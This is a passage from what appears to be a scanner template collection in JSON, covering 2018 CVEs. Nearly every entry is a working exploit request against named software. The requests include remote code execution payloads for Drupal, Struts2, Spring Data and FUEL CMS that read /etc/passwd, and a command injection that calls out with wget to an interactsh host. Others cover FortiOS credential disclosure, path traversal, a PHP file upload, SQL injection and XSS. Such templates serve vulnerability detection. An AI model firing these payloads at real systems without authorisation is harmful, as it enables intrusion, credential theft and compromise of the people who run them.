in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open 